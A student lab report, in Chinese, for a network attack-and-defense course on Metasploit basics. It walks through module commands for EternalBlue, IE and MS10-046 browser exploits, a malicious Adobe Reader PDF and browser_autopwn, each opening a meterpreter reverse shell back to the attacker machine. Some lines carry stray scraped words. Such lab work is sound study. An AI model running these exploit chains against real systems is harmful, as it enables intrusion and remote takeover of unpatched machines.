2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用
1. 实践内容
本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:
1.1一个主动攻击实践,如ms08_067; (1分)windows
1.2 一个针对浏览器的攻击,如ms11_050;(1分)浏览器
1.3 一个针对客户端的攻击,如Adobe;(1分)session
1.4 成功应用任何一个辅助模块。(0.5分)tcp
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分。工具
2.实验步骤及结果
2.1主动攻击实践,ms17_010url
靶机: Windows Server 2008 R2 (x64)
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
使用ms17_010模块: msf > use exploit/windows/smb/ms17_010_eternalblue
设置payload:payload windows/x64/meterpreter/reverse_tcp
设置ip地址 set lhost +攻击机ip地址 、set rhost +靶机ip地址
输入exploit进行攻击
攻击成功:
3d
2.2.1 针对浏览器的攻击,ms13-008code
靶机:IE 8 on Windows XP SP3
使用ms13-008模块:use exploit/windows/browser/ie_cbutton_uaf
设置payloadset payload windows/meterpreter/reverse_tcp
设置攻击机IP地址 set srvhost +攻击机ip地址
设置lhost set lhost +攻击机ip地址
exploit
orm
在靶机ie 8 浏览器输入url连接
返回攻击机输入sessions -i +session id 进入meterpreter。
server
2.2.2MS10-046 (惟一,成功)
在攻击机kali输入msfconsole进入控制台
使用ms10_046模块
set SRVHOST +攻击机ip
设置payload ,tcp反向回连
set LHOST +攻击机ip
exploit 攻击
靶机访问url连接,弹出对话框点击“容许”,会弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标,双击快捷方式,攻击机方显示成功创建会话。
使用sessions -i 1选择会话,攻击成功。
2.3. 针对客户端的攻击, adobe_toolbutton
靶机:Windows XP / Adobe Reader 9
使用adobe_toolbutton模块:use exploit/windows/fileformat/adobe_toolbutton;
生成攻击文件msf.pdf;
将文件传给靶机;
输入back返回;
设置监听程序use exploit/multi/handler;
设置payload set payload windows/meterpreter/reverse_tcp;
设置攻击机IP 地址;
输入run进行攻击;
当靶机用Adobe Reader 9 打开msf文件时,攻击成功。
2.4 成功应用任何一个辅助模块 browser autopwn
靶机:IE 8 on Windows XP SP3
•输入use auxiliary/server/browser_autopwn
•设置 payload
设置攻击机端口号
设置set LHOST 192.168.1.107
设置URIPATH
输入exploit进行攻击
靶机用浏览器打开url连接
输入 session -i 1成功得到权限
2 报告内容:
2.1.基础问题回答
用本身的话解释什么是exploit,payload,encode。
exploit:是攻击者利用靶机的漏洞进行攻击的一个过程。
payload:是攻击者为成功地实现对靶机的攻击,须要在靶机上执行的一段代码。
encode:是为了可以使靶机顺利的执行恶意代码,利用encode对payload进行的加工。
2.2.实践总结与体会
本次试验我先尝试攻击了中文版的win2008,winXP,win7这三个版本的系统,可是除了使用win2008能够顺利的完成第一个主动攻击外,剩下两个都没用。最后我仍是换了一个英文版的winXP才顺利的完成了接下来的任务。
2.3.离实战还缺些什么技术或步骤?
我认为我如今只能攻击一下微软已经放弃打补丁的winXP,偶尔运气好还能够成功地攻击win2008和win7,等着微软何时放弃了给win7打补丁,我再试试能不能用现有的工具攻破win7(仍是得说挑一些win7中打补丁少的)。虽然说如今使用win7的还有不少,但总的来讲如今已经广泛在使用win10了,而咱们攻击的还只是旧版本的系统,有些跟不上时代了,更别说实战了。
- 1. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
- 2. 20145306 《网络攻防》 MSF基础应用
- 3. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
- 4. 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
- 5. 2017-2018-2 20155203《网络对抗技术》Exp5 MSF基础应用
- 6. 2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
- 7. 2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
- 8. 2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
- 9. 20155308『网络对抗技术』Exp5 MSF基础应用
- 10. 2017-2018-2 20155204《网络对抗技术》EXP5 MSF基础应用
- 更多相关文章...
- • 网站主机 技术 - 网站主机教程
- • 互联网系统应用架构基础分析 - 红包项目实战
- • TiDB 在摩拜单车在线数据业务的应用和实践
- • Docker容器实战(一) - 封神Server端技术
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
- 2. 20145306 《网络攻防》 MSF基础应用
- 3. 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
- 4. 2018-2019-2 网络对抗技术 20165227 Exp5 MSF基础应用
- 5. 2017-2018-2 20155203《网络对抗技术》Exp5 MSF基础应用
- 6. 2018-2019-2 20165313 《网络对抗技术》 Exp5:MSF基础应用
- 7. 2017-2018-2 20155234『网络对抗技术』Exp5:MSF基础应用
- 8. 2018-2019-2 网络对抗技术 20165320 Exp5 MSF基础应用
- 9. 20155308『网络对抗技术』Exp5 MSF基础应用
- 10. 2017-2018-2 20155204《网络对抗技术》EXP5 MSF基础应用